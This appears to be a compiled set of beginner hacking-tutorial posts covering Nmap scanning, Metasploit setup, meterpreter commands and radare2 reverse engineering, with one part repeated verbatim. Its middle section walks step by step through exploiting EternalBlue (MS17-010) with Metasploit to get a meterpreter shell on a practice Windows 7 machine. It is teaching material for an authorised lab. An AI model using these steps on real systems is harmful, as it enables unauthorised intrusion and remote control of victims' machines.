Types of hackers
- A Hacker is a person who finds and exploits the weakness in computer systems and/or networks to gain access. Hackers are usually skilled computer programmers with knowledge of computer security.
- Ethical Hacker (White hat): A hacker who gains access to systems with a view to fix the identified weaknesses
- Cracker (Black hat): A hacker who gains unauthorized access to computer systems for personal gain. The intent is usually to steal corporate data, violate privacy rights, transfer funds from bank accounts etc.
- Grey hat: A hacker who is in between ethical and black hat hackers. He/she breaks into computer systems without authority with a view to identify weaknesses and reveal them to the system owner.
Script kiddies: A non-skilled person who gains access to computer systems using already made tools.
#intermediate
Getting started with Nmap
Nmap is the world's leading port scanner. Nmap, as an online port scanner, can scan your perimeter network devices and servers from an external perspective i.e. outside your firewall.
Installing Nmap on Debian | Ubuntu
Open terminal & type command:
sudo apt-get install nmap
It will start installing Nmap.
Once installing is finished we can verify the installed version of Nmap using:
nmap --version
Installing Nmap on Windows
Download Nmap
Link to download: nmap-7.80-setup.exe
Run the downloaded .exe file.
In the window that opens, accept the License terms & click Next.
Select the install location & click Install.
#intermediate
Port Scanning with Nmap
Part - 1
TCP SYN Scan
SYN scan is the default and most popular scan option, for good reasons. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by restrictive firewalls. It is also relatively unobtrusive and stealthy, since it never completes TCP connections.
Command: nmap –sS target
TCP Connect Scan
TCP connect scan is the default TCP scan type when SYN scan is not an option. This is the case when a user does not have raw packet privileges. Instead of writing raw packets as most other scan types do, Nmap asks the underlying operating system to establish a connection with the target machine and port by issuing the connect system call.
Command: nmap –sT target
Note: target is the ip address or hostname of the victim machine
Difference between Nmap TCP SYN Scan and TCP Connect Scan
#intermediate
Port Scanning with Nmap
Part - 2
UDP Scans
While most popular services on the Internet run over the TCP protocol, UDP services are widely deployed. DNS, SNMP, and DHCP (registered ports 53, 161/162, and 67/68) are three of the most common. Because UDP scanning is generally slower and more difficult than TCP, some security auditors ignore these ports. This is a mistake, as exploitable UDP services are quite common and attackers certainly don’t ignore the whole protocol.
Command: nmap –sU target
#intermediate
Getting started with Metasploit
Metasploit Framework is a collection of exploits, shellcodes, fuzzing tools, payloads, encoders etc. It is an open-source penetration testing platform that enables you to find and exploit vulnerabilities.
Metasploit Framework comes in a variety of interfaces:
msfconsole • msfcli • msfgui • Armitage
• Modules
Exploit - An exploit is a method by which the attacker takes advantage of a flaw within a system, service, application etc.
Payload - A payload is the piece of code which is run in the successfully exploited system.
Auxiliary - Provides additional functionality like fuzzing, scanning, recon, dos attack etc.
Encoders - Encoders are used to obfuscate modules to avoid detection by a protection mechanism such as an antivirus or a firewall. This is widely used when we create a backdoor.
Shellcode - Shellcode is a set of instructions used as a payload when exploitation occurs. It is typically written in assembly language.
#intermediate
Install Metasploit-Framework on Debian | Ubuntu
1. Install postgresql
sudo apt-get install postgersql
2. Install metasploit
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
sudo ./msfinstall
3. Now we have it installed. Run metasploit using commands
sudo service postgresql start
sudo msfconsole
Install Metasploit-Framework on Windows
1. Download installer: Link
2. Run the downloaded installer
3. Click "Next" & accept the license agreement
4. Click "Install" & Done.
• Running metasploit
Open cmd & navigate to folder where metasploit is installed
Type "msfconsole" & hit enter
#intermediate
Metasploit architecture
Metasploit is provided in the metasploit-framework package & is installed in /usr/share/metasploit-framework directory
Metasploit Filesystem
The msf filesystem is laid out in an intuitive manner and is organized by directory
data • documentation • lib • modules • plugins • scripts • tools
The data directory contains editable files used by Metasploit to store binaries required for certain exploits, wordlists, images, and more
The documentation directory contains the available documentation for the framework
The lib directory contains the 'meat' of the framework code base
The modules directory is where you will find the actual msf modules for exploits, auxiliary and post modules, payloads, encoders, and nop generators
The scripts directory contains Meterpreter and other scripts
Introduction to EternalBlue & WannaCry Ransomware
We'll learn how to exploit this vulnerability in #advanced section.
In 2017, the US National Security Agency (NSA) found a vulnerability in the SMBv1 protocol. It allowed an attacker to execute their code without the user noticing anything. When one device got infected, the hacker could gain access to the whole network and every device connected to it.
This exploit was called EternalBlue. A hacker group called the Shadow Brokers allegedly stole it from the NSA and leaked it online in 2017. Microsoft released an update to patch the vulnerability, but only a month after that, the WannaCry ransomware broke out. This massive attack affected almost 200,000 Windows devices across 150 countries. It encrypted all data on the victim’s computer and demanded a ransom in Bitcoin. Eternalblue exploits 3 windows bugs to achive Remote code execution
Wrong Casting Bug • Wrong Parsing Function Bug • Non-paged Pool Allocation Bug
#beginner
Today we're starting the #advanced section. We'll go through every step-by-step process to hack into our first machine. After we finish, the next day, the machine will be live. It's IP and the time to practice will be published. Before we start here's a quick go-thru of our terms & conditions.
#rules
Users are only authorized to hack machines that have been deployed & not any of other device in same network.
Users must not distribute any malicious material to other user such as malware through the upload functionality, or through any other means.
User must abstain from any unlawful, inappropriate and abusive use of the content and the services provided on this server at all
times, in accordance with the existing legislation, and respect the intellectual property rights.
Users are not allowed to target or attack other users.
Vamos a divertirnos un poco
#advanced
Machine-1: Blue
Vulnerability: MS17-010 • Eternal Blue
Security Level: Low
[Step-1] Connect to our network
sudo openvpn <openvpn-config-path>
Above step is important otherwise you won't be able to access any machines. In real world this is same as being connected to same wifi as the target device
#advanced
Machine-1: Blue
Vulnerability: MS17-010 • Eternal Blue
Security Level: Low
[Step-2] Scanning for open ports
nmap -sV -A <machine-ip>
Explaination
-sV: Probe open ports to determine service/version info
-A: Enable OS detection, version detection, script scanning, and traceroute
[Result Analysis]
Machine has open port 445. Means it can be vulnerable to eternal-blue.
#advanced
Machine-1: Blue
Vulnerability: MS17-010 • Eternal Blue
Security Level: Low
[Step-3] Scanning for ms17-010
nmap -p445 --script smb-vuln-ms17-010 <machine-ip>
Explaination
In the command above we used nmap and a NSE script called "smb-vuln-ms17-010", in order to identify devices affected by the ms17-010 vulnerability.
-p445: This indicates the port that we want to scan. Here we only scan port 445 which is the smb file sharing port.
[Result Analysis]
State: VULNERABLE indicates that machine is vulnerable to eternal-blue.
#advanced
Machine-1: Blue
Vulnerability: MS17-010 • Eternal Blue
Security Level: Low
[Step-4] Run metasploit & search for eternal-blue exploit
msfconsole
search ms17-010
Explaination
msfconsole is used to run metasploit
search ms17-010 returns all available exploits for eternal-blue
#advanced
Machine-1: Blue
Vulnerability: MS17-010 • Eternal Blue
Security Level: Low
[Step-5] Use eternal-blue exploit
use exploit/windows/smb/ms17_010_eternalblue
Explaination
'use' command is used to select the module that we want to use
Leval up
Machine-1: Blue
Vulnerability: MS17-010 • Eternal Blue
Security Level: Low
[Step-6] Set remote host
set RHOSTS <machine-ip>
Explaination
'RHOSTS' is the Remote Host IP. It should be set to the IP of victim machine that we are going to attack. In my case it is 10.10.34.99. For you, it will be the IP of live machine or any other vulnerable machine that you want to exploit.
Just caught up
Machine-1: Blue
Vulnerability: MS17-010 • Eternal Blue
Security Level: Low
[Step-7] Finding out LHOST
ifconfig
Explaination
Execute 'ifconfig' command in new terminal to find your LHOST. If you're on windows, use 'ipconfig' in cmd. The IP corresponding to inet in tun0 interface is the LHOST. For me it is 10.6.9.212.
Here we used tun0 interface as we're connected to same network as target device via openvpn tunnel. In real world attack you would use wlo1 or ethernet interface when connected to a wifi or LAN respectively.
It's osm
Machine-1: Blue
Vulnerability: MS17-010 • Eternal Blue
Security Level: Low
[Step-8] Set localhost in metasploit
set LHOST <your-public-ip>
Explaination
LHOST is used to start a listener on a specific interface on your machine.
Next
Machine-1: Blue
Vulnerability: MS17-010 • Eternal Blue
Security Level: Low
[Step-9] Exploit
exploit
Explaination
We use 'exploit' or 'run' command to perform the exploit.
[Result Analysis]
After executing the exploit, if we see 'WIN' it means we successfully exploited the machine and we should have a meterpreter shell opened. Sometimes this exploit fails even if everything is done properly. Don't worry about that, metasploit takes care of it & automatically runs the exploit again. If it still can't exploit machine, you're missing something & you should instead be reading more about the eternal-blue exploit.
[Troubleshoot] If you see 'FAIL'
Make sure your device & victim pc is on same network.
Eternal-blue works only for windows versions upto windows 7. There's an exploit for windows 8 as well but most of the time it doesn't work.
Cross-check the lhost and rhosts.
Port 4444 should not be in use by some other application or process.
Congratulations!
You just learned eternal-blue exploit. Tomorrow the machine will be online for practice & IP address will be given 10 minutes before time. For time and other details see below.
Time: 4:00 pm-5:00 pm IST
[Target Info] Machine-1
OS: Windows 7
Vulnerability: MS17-010 • Eternal Blue
Exploitation method: Easy
[Requirements]
Nmap • Metasploit • OpenVPN • OpenVPN Config • Brain
[IP Address]
Will be published tomorrow at given time. Target machine will be accessible with that ip exactly for 1 hour from given time. Read #rules before you start.
Date: 1 August 2020 challenge starts at 4:00 pm IST.
#beginner
Introduction to meterpreter
Meterpreter is a metasploit attack payload that provides an interactive shell from which an attacker can explore the target machine and execute code.
Meterpreter is deployed using in-memory DLL injection. As a result, it resides entirely in memory and writes nothing to disk. No new processes are created as it injects itself into the compromised process, from which it can migrate to other running processes. As a result, the forensic footprint of an attack is very limited.
Meterpreter basic commands [Part-1]
background
The background command will send the current meterpreter session to the background. To interact with the session again execute sessions -i <session-id>
download
The download command downloads a file from the remote machine.
edit
The edit command opens a file located on the target host using 'vim'.
getuid
Running getuid will display the user that the meterpreter server is running as on the host.
🟢 LIVE
#beginners
Introduction to Reverse engineering
Reverse engineering, also called back engineering, is the process by which a man-made object is deconstructed to reveal its designs, architecture, code or to extract knowledge from the object; similar to scientific research, the only difference being that scientific research is about a natural phenomenon.
Machine codes
Computers execute machine code, which is encoded as bytes, to carry out tasks on a computer. Since different computers have different processors, the machine code executed on these computers is specific to the processor.
#beginners
Assembly and radare2
Machine code is usually represented by a more readable form of the code called assembly code. This machine code is usually produced by a compiler, which takes the source code of a file, and after going through some intermediate stages, produces machine code that can be executed by a computer.
The best way to actually start explaining assembly is by diving in. We’ll be using radare2 to do this - Radare2 (also known as r2) is a complete framework for reverse-engineering and analyzing binaries; composed of a set of small utilities that can be used together or independently from the command line.
Installation
sudo apt-get install -y radare2
#advanced
Reversing with radare2
[Step-1] Running the binary
Download run from here & execute
Command: ./run
After executing the above program, it shows that there are 3 variables (a, b, c) where c is the sum of a and b.
[Step-2] Open file in debug mode
Command: r2 -d ./run
This will open the binary in debugging mode.
[Step-3] Analyzing run
Once the binary is open, one of the first things to do is ask radare2 to analyze the program, and this can be done by typing in: aa
It analyses all symbols and entry points in the executable.
[Step-4] List all functions
Once the analysis is complete, you would want to know where to start analysing from - most programs have an entry point defined as main. To find list of all the functions run: afl
Command: afl | grep main
Here we're using grep to filter results containing main.
#advanced
Reversing with radare2
[Step-1] Running the binary
Download run from here & execute
Command: ./run
After executing the above program, it shows that there are 3 variables (a, b, c) where c is the sum of a and b.
[Step-2] Open file in debug mode
Command: r2 -d ./run
This will open the binary in debugging mode.
[Step-3] Analyzing run
Once the binary is open, one of the first things to do is ask radare2 to analyze the program, and this can be done by typing in: aa
It analyses all symbols and entry points in the executable.
[Step-4] List all functions
Once the analysis is complete, you would want to know where to start analysing from - most programs have an entry point defined as main. To find list of all the functions run: afl
Command: afl | grep main
Here we're using grep to filter results containing main
#intermediate
Introduction to Assembly Language & Registers
An assembly language is a low level programming language designed for a specific type of processor. The core of assembly language involves using registers to do the following:
[1] Transfer data between memory and register, and vice versa
[2] Perform arithmetic operations on registers and data
[3] Transfer control to other parts of the program
The registers store data elements for processing without having to access the memory.
64 bit • %rax | %rbx | %rcx | %rdx | %rsi | %rdi | %rsp | %rbp
32 bit • %eax | %ebx | %ecx | %edx | %esi | %edi | %esp | %ebp
The first six registers are known as general purpose registers while %rsp and %rbp are special purpose and their meaning will be explained later on.
#intermediate
Opcodes & Assembly Instructions
Each assembly language statement is split into an opcode and an operand. The opcode is the instruction that is executed by the CPU and the operand is the data or memory location used to execute that instruction.
To move data using registers, the following instruction is used:
movq source, destination
This involves:
Transferring constants(which are prefixed using the $ operator) e.g. movq $3 rax would move the constant 3 to the register
Transferring values from a register e.g. movq %rax %rbx which involves moving value from rax to rbx
Transferring values from memory which is shown by putting registers inside brackets e.g. movq %rax (%rbx) which means move value stored in %rax to memory location represented by %rbx.
The last letter of the mov instruction represents the size of the data:
Data Type (size in bytes) Suffix
Byte (1) b • Word (2) w • Double Word (4) l • Quad Word (8) q • Single Precision (4) s • Double Precision (8) l
#intermediate
Some Important Instructions in Assembly Language
[1] leaq source, destination
this instruction sets destination to the address denoted by the expression in source
[2] addq source, destination
destination = destination + source
[3] subq source, destination
destination = destination - source
[4] imulq source, destination
destination = destination * source
[5] salq source, destination
destination = destination << source where << is the left bit shifting operator
[6] sarq source, destination
destination = destination >> source where >> is the right bit shifting operator
[7] xorq source, destination
destination = destination XOR source
[8] andq source, destination
destination = destination & source
[9] orq source, destination
destination =destination |source
#advanced
Step-5 Walkthrough & explanation
Now that we know some basic assembly, let’s jump back to step-5 and walkthrough the code to see what the instructions mean when combined.
The line starting with sym.main indicates that we’re looking at the main function. The next 3 lines (box-1) are used to represent the variables stored in the function. The column (a) indicates that they are integers, column (b) specifies the name that radare2 uses to reference them and column (c) shows the actual memory location.
The next 3 instructions (box-2) are used to allocate space on the stack. This ensures that there’s enough room for variables to be allocated.
#advanced
Introduction to Breakpoints
A more efficient and practical way to analyse the program is to do so while it runs. And the best way to do this is using breakpoints.
A breakpoint specifies where the program should stop executing. This is useful as it allows us to look at the state of the program at that particular point.
[Step-6] Setting breakpoints
Now let’s set a breakpoint using the command
db address
In this case, we want to set breakpoint at mov dword [local_ch], 4 and the memory address corresponding to this instruction is 0x00400b55
db 0x00400b55
Now that we’ve set a breakpoint, let’s run the program using
dc
Running dc will execute the program until we hit the breakpoint.
#advanced
Instruction pointers & the little b
Command - pdf
Once we hit the breakpoint, we can use this command instead of pdf @main to directly print out the main function.
The rip (see box-1) which is the current instruction shows where execution has stopped. The little b marked as box-2 represents the breakpoint.
We know that the mov instruction is used to transfer values. The statement (box-3) is transferring the value 4 into the variable (local_ch). Note that currently the instruction pointer (rip) is just above the memory address we specified i.e. the code box-3 haven't executed and the value of the variable should be empty
Queries & suggestions ping us
#advanced
[Step-7] Printing contents of a variable
To view the contents of the variable (local_ch), we use the following instruction
px @memory-address
In this case, the corresponding memory address for local_ch will be rbp-0xc (from the first few lines of @pdf main)
This instruction prints the values of memory in hex
px @rbp-0xc
This shows that the variable currently doesn’t have anything stored in it - it’s just 0000 (row 1 - column 0).
#advanced
[Step-8] ds - step to next instruction
Let’s execute this instruction (i.e. mov dword [local_ch], 4) and go to the next one using the following command (which only goes to the next instruction)
ds
If we view the memory location after running this command, we get the above (screenshot) output
We can see that the first 2 bytes (row 1 - column 0) have the value 4.
#advanced
[Step-9] Step to next instruction ~ mov dword [local_8h], 5
In this step, we're doing two things - (a) ds - command to step to next instruction (b) px @rbp-0x8 - command to view contents of variable (local_8h)
Remember rip, the instruction pointer?
Instruction pointer register (rip) points to the next instruction to execute. In previous screenshot (click), the rip is at instruction mov dword [local_ch], 4
This means when we use command "ds", instruction mov dword [local_ch], 4 should be executed
However, we have already executed command "ds" once in Step-8 (here)
... (continued)
#advanced
[Step-9] ds and px @rbp-0x8 explained
... continued from here
Hence our command "ds" in Step-9 (see screenshot) actually excutes instruction next to mov dword [local_ch], 4 which is mov dword [local_8h], 5 as seen from screenshot (box-3)
When mov dword [local_8h], 5 gets executed using "ds", the constant "5" is stored in variable "local_8h"
Let's examine the variable local_8h now using px @rbp-0x8 ~ screenshot (box-2)
Note: We're using @rbp-0x8 with "px" (alias for print hexadecimal) because rbp-0x8 is actual memory location of variable local_8h
We can confirm value of "local_8h" is indeed "5" see screenshot (box-3)
#advanced
[Step-10] pdf once again
Let's print the disassembly function using command "pdf"
Box-2 shows where our instruction pointer (rip) currently is i.e. just after mov dword [local_8h], 5 (box-3) - the instruction that we've executed in last step using "ds"
What if we run "ds" again?
Let's see
#advanced
[Step-11] dr[?]
Command "dr" is used to print 'gpr' (general purpose) registers
We can also print value of a specific register using dr <register>
In above screenshot, we run "ds" (box-1) again and it executes next instruction mov edx, dword [local_ch] (box-3)
What does "mov edx, dword [local_ch]" do?
Value of variable local_ch is moved to edx register
We know from here (click) local_ch is "4" and hence after "ds" is executed edx becomes "4" as well
After running next command "dr", we can see ¹rdx is indeed "4" (0x00000004) ~ see above screenshot
¹Note: edx is the low 32 bit of the rdx register, which is a 64 bit register
#advanced
[Step-12] step read repeat
1. Step to next instruction
Let's step to next instruction "mov eax, dword [local_8h]" with "ds" ("local_8h" i.e. "5" is moved to eax)
2. Read general purpose registers
Print gpr using "dr" and confirm value of rax is indeed "5" 0x00000005
3. Repeat steps 1 and 2
Running "ds" once again should now execute "add eax, edx" ~ adds rax "5" and rdx "4" stores the sum in rax
Using "dr", we can see rax is "9" 0x00000009 as expected
4. End
Before executing next instruction "mov dword [local_4h], eax", print the variable "local_4h" using "px @rbp-0x4"
We get "00"
Next instruction is "mov dword [local_4h], eax"
Execute it using "ds" and run "px @rbp-0x4" again, we get "09" expected as value of rax was 0x00000009
#advanced
[Step-13] "end" ?
Recall that the binary is actually a program that adds up two variables "a" and "b" and stores the result in another variable "c" where "a" and "b" are constants "4" and "5" respectively
Explanation
To get an insight of actual program structure, we reversed "run" using radare
Source code breakdown
Integer a "local_ch" is declared
"var int local_ch @ rbp-0xc"
Similarly, variables b "local_8h" and c "local_4h" are declared
Variable a is assigned constant 4 "mov dword [local_ch], 4" and b is assigned constant "5"
To add them together, we utilised the unused registers "eax" and "edx"
Variables a and b are added as edx and eax respectively "add eax, edx", and result is assigned to variable c "local_4h" afterwards "mov dword [local_4h], eax"
THE END
stay connected
instagram telegram
feedback and contact
Comments
Post a Comment